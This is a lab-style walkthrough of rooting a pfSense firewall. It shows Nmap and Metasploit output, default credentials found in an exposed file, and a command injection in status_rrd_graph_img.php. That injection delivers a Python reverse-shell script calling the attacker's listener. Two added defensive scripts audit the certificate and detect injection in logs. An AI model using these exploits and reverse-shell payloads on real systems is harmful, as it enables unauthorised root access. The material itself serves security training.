Nmap discovered 2 open ports for http and ssl.
```
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
443/tcp open  ssl/https?
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Issuer: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-10-14T19:21:35
| Not valid after:  2023-04-06T19:21:35
| MD5:   65f8 b00f 57d2 3468 2c52 0f44 8110 c622
|_SHA-1: 4f7c 9a75 cb7f 70d3 8087 08cb 8c27 20dc 05f1 bb02
|_ssl-date: TLS randomness does not represent time
```
First, let’s add the host to the hosts file and go to the web application.
Apparently, the certificate is weird and the browser does not let me make an exception. So instead, let’s go to the application with just the IP in the URI:
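The browser’s refusal makes sense once you look at the certificate Nmap printed: it is self-signed, uses a 1024-bit RSA key and still carries the OpenSSL prompt text in its commonName. The following is an added example, not part of the original writeup, that parses Nmap’s `ssl-cert` block (the values above are embedded as the sample) and reports those weaknesses; the 2048-bit minimum and the `now_iso` timestamp are assumptions chosen for the example.

```python
from datetime import datetime

# Constructed sample: the ssl-cert block exactly as Nmap printed it in the scan above.
NMAP_SSL_CERT = """\
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Issuer: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-10-14T19:21:35
| Not valid after:  2023-04-06T19:21:35
| MD5:   65f8 b00f 57d2 3468 2c52 0f44 8110 c622
|_SHA-1: 4f7c 9a75 cb7f 70d3 8087 08cb 8c27 20dc 05f1 bb02
"""

MIN_RSA_BITS = 2048  # assumed policy threshold for this example


def parse_ssl_cert(block):
    """Turn the '| key: value' lines of Nmap's ssl-cert script output into a dict."""
    fields = {}
    for line in block.splitlines():
        line = line.lstrip("|_ ").strip()          # drop Nmap's tree prefix
        if line.startswith("ssl-cert:"):
            line = line[len("ssl-cert:"):].strip()  # first line carries the script name
        key, sep, value = line.partition(":")       # split on the first colon only
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def parse_dn(dn):
    """Split an Nmap-style distinguished name 'k=v/k=v/...' into a dict."""
    return dict(part.split("=", 1) for part in dn.split("/") if "=" in part)


def audit_cert(block, now_iso):
    """Return a list of human-readable findings for the certificate in `block`.

    `now_iso` is the evaluation time as an ISO-8601 string, passed in so the
    result is reproducible.
    """
    fields = parse_ssl_cert(block)
    findings = []

    subject = parse_dn(fields.get("Subject", ""))
    issuer = parse_dn(fields.get("Issuer", ""))
    if subject and subject == issuer:
        findings.append("self-signed certificate (Subject equals Issuer)")
    if "YOUR name" in subject.get("commonName", ""):
        findings.append("placeholder commonName left over from the openssl prompt defaults")

    bits = int(fields.get("Public Key bits", "0"))
    if fields.get("Public Key type") == "rsa" and bits < MIN_RSA_BITS:
        findings.append("weak RSA key: %d bits (policy minimum %d)" % (bits, MIN_RSA_BITS))

    not_after = datetime.fromisoformat(fields["Not valid after"])
    if datetime.fromisoformat(now_iso) > not_after:
        findings.append("expired on " + fields["Not valid after"])
    return findings


if __name__ == "__main__":
    for finding in audit_cert(NMAP_SSL_CERT, "2021-04-14T00:00:00"):
        print("-", finding)
```

Run against the scan date used in this writeup it reports the self-signed issuer, the placeholder name and the 1024-bit key; run with a date after 2023-04-06 it additionally reports the expiry.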
Ok, going to the application with the IP works fine and a login form appears.
I have tried some default passwords and an SQLi error check, with no success:
Wikipedia info on pfSense
pfSense is a firewall / computer software distribution based on FreeBSD.
```
# searchsploit pfsense
 Exploit Title                                                                  |  Path
<deleted XSS and CSRF exploits>
pfSense - (Authenticated) Group Member Remote Command Execution (Metasploit)    | unix/remote/43193.rb
pfSense 2.3.1_1 - Command Execution                                             | php/webapps/43128.txt
Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection                                | php/webapps/47413.py
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection                 | php/webapps/43560.py
```
- Metasploit module RCE – requires an authenticated user
- Python exploit, command injection with reverse shell – requires auth

The description of the Python exploit reads: “pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection. This script will return a reverse shell on specified listener address and port. Ensure you have started a listener to catch the shell before running!”
Metasploit exploit modules
```
msf6 > search pfsense

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   ------------------------------------------------------------------------------------------------------------------------------------------
   0  exploit/unix/http/pfsense_clickjacking          2017-11-21       normal     No     Clickjacking Vulnerability In CSRF Error Page pfSense
   1  exploit/unix/http/pfsense_graph_injection_exec  2016-04-18       excellent  No     pfSense authenticated graph status RCE
   2  exploit/unix/http/pfsense_group_member_exec     2017-11-06       excellent  Yes    pfSense authenticated group member RCE
```
Dirbuster did not find a single file or directory on port 80 (probably because of redirect/firewall rules). However, that is not the case for port 443.
The files system-users.txt and changelog.txt seem interesting. Let’s check them.
```
####Support ticket###

Please create the following user

username: Rohit
password: company defaults
```
We have a user Rohit with default credentials for pfsense.
According to the Netgate docs, the default credentials for pfSense are admin:pfsense, so in our case they should be rohit:pfsense.
```
# Security Changelog

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window
```
Apparently there have been 3 vulnerabilities, 2 of which are patched and 1 still unpatched.

Let’s log in with the obtained credentials (rohit:pfsense). There are multiple dropdown menus in the interface; however, only under Status do we find additional functionality.

During the enumeration phase we discovered multiple exploits, learned that there is an unpatched vulnerability, and obtained credentials. Some of the identified exploits require authentication, so we should try them first.
```
   1  exploit/unix/http/pfsense_graph_injection_exec  2016-04-18       excellent  No     pfSense authenticated graph status RCE
```
Obtaining a Meterpreter session from the Metasploit module pfsense_graph_injection_exec:
```
msf6 exploit(unix/http/pfsense_graph_injection_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (39282 bytes) to 10.10.10.60
[+] Deleted KIXxVsv
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.60:15059) at 2021-04-14 09:43:38 -0400

meterpreter > shell
Process 97206 created.
Channel 0 created.
id
uid=0(root) gid=0(wheel) groups=0(wheel)
```
We know there is a command injection vulnerability somewhere. While googling more on that, I found the following post describing the command injection in status_rrd_graph_img.php in detail.

Within RRD Graphs we find the PHP file that is needed for this to work. Making a request from within the page, captured with Burp, shows the following:
```
GET /status_rrd_graph_img.php?start=1618380935&end=1618409735&database=system-processor.rrd&style=inverse&graph=eight_hour HTTP/1.1
Host: 10.10.10.60
Connection: close
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://10.10.10.60/status_rrd_graph.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=4dbcd8342e5f415d50a83af577962a2e; cookie_test=1618413161
```
We’re interested in the request that invokes the queues database, since our commands can be injected right after it:

Unfortunately the response is gibberish we don’t speak. A neat little trick is to pipe the response to netcat, which makes it readable, like so:
```
# nc -nvlp 3333
listening on [any] 3333 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.60] 59699
CMD INJECT
```
In order to open a reverse shell, we have to feed the request with our own Python script, taken from the Python exploit mentioned above.
```
$ cat pipe-reverse.py
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.5",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
```

```
# nc -nvlp 3333 < pipe-reverse.py
listening on [any] 3333 ...
```

```
$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.60] 20248
sh: can't access tty; job control turned off
#
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
```
It might be necessary to press “Cancel” on the request in Burp in order to trigger the Python script for the reverse shell.
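From the defender’s side, every step of this injection leaves a trace in the web server log: the `database` parameter of `status_rrd_graph_img.php` legitimately only ever carries a bare file name such as `system-processor.rrd`, so any shell metacharacter in it (a `;`, `|`, newline and so on, possibly percent-encoded) is a strong signal. The following is an added example, not code from the original writeup or from pfSense, that runs that allowlist check over a few constructed lighttpd access-log lines. It assumes lighttpd’s default Apache-combined-style log format; the injected values in the sample are meaningless placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (lighttpd default accesslog format, assumed).
# Lines 3 and 4 carry a ";" and a newline inside the database parameter,
# percent-encoded as %3B and %0A; the command text itself is a placeholder.
SAMPLE_LOG = """\
10.10.14.5 10.10.10.60 - [14/Apr/2021:09:40:01 -0400] "GET /status_rrd_graph.php HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
10.10.14.5 10.10.10.60 - [14/Apr/2021:09:40:02 -0400] "GET /status_rrd_graph_img.php?start=1618380935&end=1618409735&database=system-processor.rrd&style=inverse&graph=eight_hour HTTP/1.1" 200 5123 "https://10.10.10.60/status_rrd_graph.php" "Mozilla/5.0"
10.10.14.5 10.10.10.60 - [14/Apr/2021:09:52:17 -0400] "GET /status_rrd_graph_img.php?database=queues%3BPLACEHOLDER_COMMAND&graph=eight_hour HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.5 10.10.10.60 - [14/Apr/2021:09:53:40 -0400] "GET /status_rrd_graph_img.php?database=queues%0APLACEHOLDER_COMMAND HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# source host, vhost, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d+)'
)

# Allowlist for a legitimate RRD database name: letters, digits, '_', '.', '-'.
SAFE_CHAR = re.compile(r"[A-Za-z0-9_.-]")
SAFE_DATABASE = re.compile(r"[A-Za-z0-9_.-]+")


def inspect_request(target):
    """Return a reason string if the request target looks like RRD graph
    command injection, otherwise None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/status_rrd_graph_img.php"):
        return None
    # parse_qs percent-decodes the values, so %3B and %0A are seen as ';' and '\n'.
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("database", []):
        # fullmatch rather than match()+'$': '$' would tolerate a trailing newline.
        if not SAFE_DATABASE.fullmatch(value):
            bad = sorted({c for c in value if not SAFE_CHAR.match(c)})
            return "database parameter contains %r" % "".join(bad)
    return None


def scan_log(text):
    """Run inspect_request over every parseable log line; return a list of alerts."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = inspect_request(m.group("target"))
        if reason:
            alerts.append({"src": m.group("src"), "time": m.group("ts"), "reason": reason})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print("%(time)s  %(src)s  %(reason)s" % alert)
```

The check is an allowlist on the one parameter that reaches a shell, not a blocklist of known payloads, so an encoded or unusual metacharacter is caught as long as the decoder sees it; the benign request from the Burp capture above passes, and so does a plain `database=queues`.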